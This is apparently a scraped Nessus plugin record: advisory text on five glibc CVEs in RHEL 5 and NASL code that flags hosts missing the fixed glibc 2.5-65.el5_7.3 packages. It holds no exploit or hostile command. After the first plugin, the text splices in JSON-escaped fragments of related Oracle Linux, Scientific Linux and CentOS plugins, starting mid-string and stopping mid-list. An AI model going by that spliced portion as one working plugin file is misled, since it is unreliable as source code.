ID: REDHAT-RHSA-2012-0126.NASL
Type: nessus
Reporter: This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.
Modified: 2012-02-14T00:00:00
Description
Updated glibc packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 5.

The Red Hat Security Response Team has rated this update as having
moderate security impact. Common Vulnerability Scoring System (CVSS)
base scores, which give detailed severity ratings, are available for
each vulnerability from the CVE links in the References section.

The glibc packages contain the standard C libraries used by multiple
programs on the system. These packages contain the standard C and the
standard math libraries. Without these two libraries, a Linux system
cannot function properly.

An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way the glibc library read timezone files. If a
carefully-crafted timezone file was loaded by an application linked
against glibc, it could cause the application to crash or,
potentially, execute arbitrary code with the privileges of the user
running the application. (CVE-2009-5029)

A flaw was found in the way the ldd utility identified dynamically
linked libraries. If an attacker could trick a user into running ldd
on a malicious binary, it could result in arbitrary code execution
with the privileges of the user running ldd. (CVE-2009-5064)

An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way the glibc library loaded ELF (Executable and Linking
Format) files. If a carefully-crafted ELF file was loaded by an
application linked against glibc, it could cause the application to
crash or, potentially, execute arbitrary code with the privileges of
the user running the application. (CVE-2010-0830)

It was found that the glibc addmntent() function, used by various
mount helper utilities, did not handle certain errors correctly when
updating the mtab (mounted file systems table) file. If such utilities
had the setuid bit set, a local attacker could use this flaw to
corrupt the mtab file. (CVE-2011-1089)

A denial of service flaw was found in the remote procedure call (RPC)
implementation in glibc. A remote attacker able to open a large number
of connections to an RPC service that is using the RPC implementation
from glibc, could use this flaw to make that service use an excessive
amount of CPU time. (CVE-2011-4609)

Red Hat would like to thank the Ubuntu Security Team for reporting
CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The
Ubuntu Security Team acknowledges Dan Rosenberg as the original
reporter of CVE-2010-0830.

Users should upgrade to these updated packages, which resolve these
issues.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
# The descriptive text and package checks in this plugin were
# extracted from Red Hat Security Advisory RHSA-2012:0126. The text
# itself is copyright (C) Red Hat, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(57929);
  script_version("1.22");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/14");

  script_cve_id("CVE-2009-5029", "CVE-2009-5064", "CVE-2010-0830", "CVE-2011-1089", "CVE-2011-4609");
  script_bugtraq_id(40063, 46740, 50898, 51439);
  script_xref(name:"RHSA", value:"2012:0126");

  script_name(english:"RHEL 5 : glibc (RHSA-2012:0126)");
  script_summary(english:"Checks the rpm output for the updated packages");

  script_set_attribute(
    attribute:"synopsis",
    value:"The remote Red Hat host is missing one or more security updates."
  );
  script_set_attribute(
    attribute:"description",
    value:
"Updated glibc packages that fix multiple security issues are now
available for Red Hat Enterprise Linux 5.
The Red Hat Security Response Team has rated this update as having
moderate security impact. Common Vulnerability Scoring System (CVSS)
base scores, which give detailed severity ratings, are available for
each vulnerability from the CVE links in the References section.
The glibc packages contain the standard C libraries used by multiple
programs on the system. These packages contain the standard C and the
standard math libraries. Without these two libraries, a Linux system
cannot function properly.
An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way the glibc library read timezone files. If a
carefully-crafted timezone file was loaded by an application linked
against glibc, it could cause the application to crash or,
potentially, execute arbitrary code with the privileges of the user
running the application. (CVE-2009-5029)
A flaw was found in the way the ldd utility identified dynamically
linked libraries. If an attacker could trick a user into running ldd
on a malicious binary, it could result in arbitrary code execution
with the privileges of the user running ldd. (CVE-2009-5064)
An integer overflow flaw, leading to a heap-based buffer overflow, was
found in the way the glibc library loaded ELF (Executable and Linking
Format) files. If a carefully-crafted ELF file was loaded by an
application linked against glibc, it could cause the application to
crash or, potentially, execute arbitrary code with the privileges of
the user running the application. (CVE-2010-0830)
It was found that the glibc addmntent() function, used by various
mount helper utilities, did not handle certain errors correctly when
updating the mtab (mounted file systems table) file. If such utilities
had the setuid bit set, a local attacker could use this flaw to
corrupt the mtab file. (CVE-2011-1089)
A denial of service flaw was found in the remote procedure call (RPC)
implementation in glibc. A remote attacker able to open a large number
of connections to an RPC service that is using the RPC implementation
from glibc, could use this flaw to make that service use an excessive
amount of CPU time. (CVE-2011-4609)
Red Hat would like to thank the Ubuntu Security Team for reporting
CVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The
Ubuntu Security Team acknowledges Dan Rosenberg as the original
reporter of CVE-2010-0830.
Users should upgrade to these updated packages, which resolve these
issues."
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/errata/RHSA-2012:0126"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2011-1089"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2009-5064"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2009-5029"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2011-4609"
  );
  script_set_attribute(
    attribute:"see_also",
    value:"https://access.redhat.com/security/cve/cve-2010-0830"
  );
  script_set_attribute(attribute:"solution", value:"Update the affected packages.");
  script_set_cvss_base_vector("CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"plugin_type", value:"local");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-common");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-devel");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-headers");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:glibc-utils");
  script_set_attribute(attribute:"cpe", value:"p-cpe:/a:redhat:enterprise_linux:nscd");
  script_set_attribute(attribute:"cpe", value:"cpe:/o:redhat:enterprise_linux:5");

  script_set_attribute(attribute:"vuln_publication_date", value:"2010/06/01");
  script_set_attribute(attribute:"patch_publication_date", value:"2012/02/13");
  script_set_attribute(attribute:"plugin_publication_date", value:"2012/02/14");
  script_set_attribute(attribute:"generated_plugin", value:"current");
  script_end_attributes();

  script_category(ACT_GATHER_INFO);
  script_copyright(english:"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.");
  script_family(english:"Red Hat Local Security Checks");

  script_dependencies("ssh_get_info.nasl");
  script_require_keys("Host/local_checks_enabled", "Host/RedHat/release", "Host/RedHat/rpm-list", "Host/cpu");

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("rpm.inc");

# Local checks must be enabled and the host must report itself as RHEL 5.x.
if (!get_kb_item("Host/local_checks_enabled")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);
release = get_kb_item("Host/RedHat/release");
if (isnull(release) || "Red Hat" >!< release) audit(AUDIT_OS_NOT, "Red Hat");
os_ver = pregmatch(pattern: "Red Hat Enterprise Linux.*release ([0-9]+(\.[0-9]+)?)", string:release);
if (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, "Red Hat");
os_ver = os_ver[1];
if (! preg(pattern:"^5([^0-9]|$)", string:os_ver)) audit(AUDIT_OS_NOT, "Red Hat 5.x", "Red Hat " + os_ver);

# The installed RPM list must be present in the knowledge base.
if (!get_kb_item("Host/RedHat/rpm-list")) audit(AUDIT_PACKAGE_LIST_MISSING);

# Only x86_64, i386 through i686, and s390 architectures are covered.
cpu = get_kb_item("Host/cpu");
if (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);
if ("x86_64" >!< cpu && cpu !~ "^i[3-6]86$" && "s390" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, "Red Hat", cpu);

# First path: if yum updateinfo data is available, report on the advisory from it.
yum_updateinfo = get_kb_item("Host/RedHat/yum-updateinfo");
if (!empty_or_null(yum_updateinfo))
{
  rhsa = "RHSA-2012:0126";
  yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);
  if (!empty_or_null(yum_report))
  {
    security_report_v4(
      port       : 0,
      severity   : SECURITY_WARNING,
      extra      : yum_report
    );
    exit(0);
  }
  else
  {
    audit_message = "affected by Red Hat security advisory " + rhsa;
    audit(AUDIT_OS_NOT, audit_message);
  }
}
else
{
  # Fallback path: check each package against the fixed build 2.5-65.el5_7.3;
  # flag counts the rpm_check() hits.
  flag = 0;
  if (rpm_check(release:"RHEL5", reference:"glibc-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", cpu:"i386", reference:"glibc-common-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"glibc-common-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"glibc-common-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", reference:"glibc-devel-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", cpu:"i386", reference:"glibc-headers-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"glibc-headers-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"glibc-headers-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", cpu:"i386", reference:"glibc-utils-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"glibc-utils-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"glibc-utils-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", cpu:"i386", reference:"nscd-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", cpu:"s390x", reference:"nscd-2.5-65.el5_7.3")) flag++;
  if (rpm_check(release:"RHEL5", cpu:"x86_64", reference:"nscd-2.5-65.el5_7.3")) flag++;

  if (flag)
  {
    # At least one check hit: emit the finding with the package report.
    security_report_v4(
      port       : 0,
      severity   : SECURITY_WARNING,
      extra      : rpm_report_get() + redhat_report_package_caveat()
    );
    exit(0);
  }
  else
  {
    # No hits: audit as not affected, or as not installed if nothing was tested.
    tested = pkg_tests_get();
    if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);
    else audit(AUDIT_PACKAGE_NOT_INSTALLED, "glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc");
  }
}
or an Affiliate thereof.\");\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"EL5\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else 
security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-utils / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T13:46:22", "description": "The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. 
(CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 14, "published": "2012-08-01T00:00:00", "title": "Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20120213)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-08-01T00:00:00", "cpe": ["p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common", "p-cpe:/a:fermilab:scientific_linux:glibc", "p-cpe:/a:fermilab:scientific_linux:glibc-common", "p-cpe:/a:fermilab:scientific_linux:glibc-devel", "p-cpe:/a:fermilab:scientific_linux:nscd", "p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo", "x-cpe:/o:fermilab:scientific_linux", "p-cpe:/a:fermilab:scientific_linux:glibc-utils", "p-cpe:/a:fermilab:scientific_linux:glibc-headers"], "id": "SL_20120213_GLIBC_ON_SL5_X.NASL", "href": "https://www.tenable.com/plugins/nessus/61244", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text is (C) Scientific Linux.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(61244);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n\n script_name(english:\"Scientific Linux Security Update : glibc on SL5.x i386/x86_64 (20120213)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n 
value:\n\"The remote Scientific Linux host is missing one or more security\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. 
A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1202&L=scientific-linux-errata&T=0&P=2446\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b70164f6\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2010/06/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/02/13\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/08/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n 
script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 5.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL5\", reference:\"glibc-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-debuginfo-common-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-devel-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-headers-2.5-65.el5_7.3\")) flag++;\nif (rpm_check(release:\"SL5\", reference:\"glibc-utils-2.5-65.el5_7.3\")) flag++;\nif 
(rpm_check(release:\"SL5\", reference:\"nscd-2.5-65.el5_7.3\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:27:30", "description": "Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. 
If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. 
The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.", "edition": 25, "published": "2012-02-14T00:00:00", "title": "CentOS 5 : glibc (CESA-2012:0126)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-4609", "CVE-2010-0830", "CVE-2009-5029", "CVE-2011-1089", "CVE-2009-5064"], "modified": "2012-02-14T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:nscd", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-headers", "cpe:/o:centos:centos:5", "p-cpe:/a:centos:centos:glibc"], "id": "CENTOS_RHSA-2012-0126.NASL", "href": "https://www.tenable.com/plugins/nessus/57924", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2012:0126 and \n# CentOS Errata and Security Advisory 2012:0126 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(57924);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-5029\", \"CVE-2009-5064\", \"CVE-2010-0830\", \"CVE-2011-1089\", \"CVE-2011-4609\");\n script_bugtraq_id(40063, 46740, 50898, 51439);\n script_xref(name:\"RHSA\", value:\"2012:0126\");\n\n script_name(english:\"CentOS 5 : glibc (CESA-2012:0126)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5.\n\nThe Red Hat Security Response Team 
has rated this update as having\nmoderate security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nThe glibc packages contain the standard C libraries used by multiple\nprograms on the system. These packages contain the standard C and the\nstandard math libraries. Without these two libraries, a Linux system\ncannot function properly.\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library read timezone files. If a\ncarefully-crafted timezone file was loaded by an application linked\nagainst glibc, it could cause the application to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning the application. (CVE-2009-5029)\n\nA flaw was found in the way the ldd utility identified dynamically\nlinked libraries. If an attacker could trick a user into running ldd\non a malicious binary, it could result in arbitrary code execution\nwith the privileges of the user running ldd. (CVE-2009-5064)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way the glibc library loaded ELF (Executable and Linking\nFormat) files. If a carefully-crafted ELF file was loaded by an\napplication linked against glibc, it could cause the application to\ncrash or, potentially, execute arbitrary code with the privileges of\nthe user running the application. (CVE-2010-0830)\n\nIt was found that the glibc addmntent() function, used by various\nmount helper utilities, did not handle certain errors correctly when\nupdating the mtab (mounted file systems table) file. If such utilities\nhad the setuid bit set, a local attacker could use this flaw to\ncorrupt the mtab file. (CVE-2011-1089)\n\nA denial of service flaw was found in the remote procedure call (RPC)\nimplementation in glibc. 
A remote attacker able to open a large number\nof connections to an RPC service that is using the RPC implementation\nfrom glibc, could use this flaw to make that service use an excessive\namount of CPU time. (CVE-2011-4609)\n\nRed Hat would like to thank the Ubuntu Security Team for reporting\nCVE-2010-0830, and Dan Rosenberg for reporting CVE-2011-1089. The\nUbuntu Security Team acknowledges Dan Rosenberg as the original\nreporter of CVE-2010-0830.\n\nUsers should upgrade to these updated packages, which resolve these\nissues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2012-February/018428.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e48699c2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2009-5064\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n 